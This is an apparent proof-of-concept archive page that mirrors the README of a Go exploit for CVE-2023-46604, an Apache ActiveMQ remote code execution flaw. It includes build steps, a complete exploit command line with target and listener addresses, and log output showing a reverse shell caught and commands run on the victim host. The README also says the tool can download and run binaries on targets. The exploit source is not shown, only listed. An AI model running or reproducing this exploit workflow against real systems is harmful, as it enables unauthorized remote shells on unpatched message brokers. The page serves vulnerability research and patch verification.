Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1110 CNY

100%
Buy Us a Coffee

CVE-2023-46604 PoC — Apache ActiveMQ, Apache ActiveMQ Legacy OpenWire Module: Unbounded deserialization causes ActiveMQ to be vulnerable to a

Source
https://github.com/vulncheck-oss/cve-2023-46604
Associated Vulnerability
Title:Apache ActiveMQ, Apache ActiveMQ Legacy OpenWire Module: Unbounded deserialization causes ActiveMQ to be vulnerable to a remote code execution (RCE) attack (CVE-2023-46604)
Description:The Java OpenWire protocol marshaller is vulnerable to Remote Code Execution. This vulnerability may allow a remote attacker with network access to either a Java-based OpenWire broker or client to run arbitrary shell commands by manipulating serialized class types in the OpenWire protocol to cause either the client or the broker (respectively) to instantiate any class on the classpath. Users are recommended to upgrade both brokers and clients to version 5.15.16, 5.16.7, 5.17.6, or 5.18.3 which fixes this issue.
Description
A go-exploit for Apache ActiveMQ CVE-2023-46604
Readme
# Apache ActiveMQ CVE-2023-46604

CVE-2023-46604 is a widely exploited vulnerability that appears on CISA's KEV list. This go-exploit implementation can execute a reverse shell on the targets using a Nashorn payload, or download a binary to the target and execute it.


## Compiling

To build the exploit into a docker image simply:

```
make docker
```

If you have a Go build environment handy, you can also just use `make`:

```
albinolobster@mournland:~/cve-2023-46604$ make
gofmt -d -w cve-2023-46604.go 
golangci-lint run --fix cve-2023-46604.go
GOOS=linux GOARCH=arm64 go build -o build/cve-2023-46604_linux-arm64 cve-2023-46604.go
```

## Example Output


```sh
albinolobster@mournland:~/cve-2023-46604$ ./build/cve-2023-46604_linux-arm64 -v -c -e -rhost 10.9.49.129 -rport 61616 -lhost 10.9.49.131 -lport 1270 -httpAddr 10.9.49.131 -c2 SimpleShellServer
time=2023-11-09T16:07:48.317-05:00 level=STATUS msg="Starting listener on 10.9.49.131:1270"
time=2023-11-09T16:07:48.317-05:00 level=STATUS msg="Starting target" index=0 host=10.9.49.129 port=61616 ssl=false "ssl auto"=false
time=2023-11-09T16:07:48.317-05:00 level=STATUS msg="Validating ActiveMQ target" host=10.9.49.129 port=61616
time=2023-11-09T16:07:48.398-05:00 level=SUCCESS msg="Target validation succeeded!" host=10.9.49.129 port=61616
time=2023-11-09T16:07:48.398-05:00 level=STATUS msg="Running a version check on the remote target" host=10.9.49.129 port=61616
time=2023-11-09T16:07:48.465-05:00 level=VERSION msg="The self-reported version is: 5.18.2" host=10.9.49.129 port=61616 version=5.18.2
time=2023-11-09T16:07:48.465-05:00 level=SUCCESS msg="The target appears to be a vulnerable version!" host=10.9.49.129 port=61616
time=2023-11-09T16:07:48.465-05:00 level=STATUS msg="HTTP server listening for 10.9.49.131:8080/JbmoWIDSyYqW"
time=2023-11-09T16:07:50.467-05:00 level=STATUS msg=Connecting...
time=2023-11-09T16:07:50.467-05:00 level=STATUS msg="Sending exploit"
time=2023-11-09T16:07:50.467-05:00 level=STATUS msg="Exploit successfully completed"
time=2023-11-09T16:07:50.510-05:00 level=STATUS msg="Sending payload"
time=2023-11-09T16:07:50.516-05:00 level=STATUS msg="Sending payload"
time=2023-11-09T16:07:50.657-05:00 level=SUCCESS msg="Caught new shell from 10.9.49.129:37034"
time=2023-11-09T16:07:50.657-05:00 level=STATUS msg="Active shell from 10.9.49.129:37034"
id
uid=1000(albinolobster) gid=1000(albinolobster) groups=1000(albinolobster),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),120(lpadmin),132(lxd),133(sambashare)
whoami
albinolobster
```
File Snapshot

 [4.0K]  /data/pocs/4115658dbf96996f152341316d009c1af21f981c
├── [6.4K]  cve-2023-46604.go
├── [ 466]  Dockerfile
├── [ 869]  go.mod
├── [4.7K]  go.sum
├── [ 11K]  LICENSE
├── [2.1K]  Makefile
└── [2.5K]  README.md

0 directories, 7 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →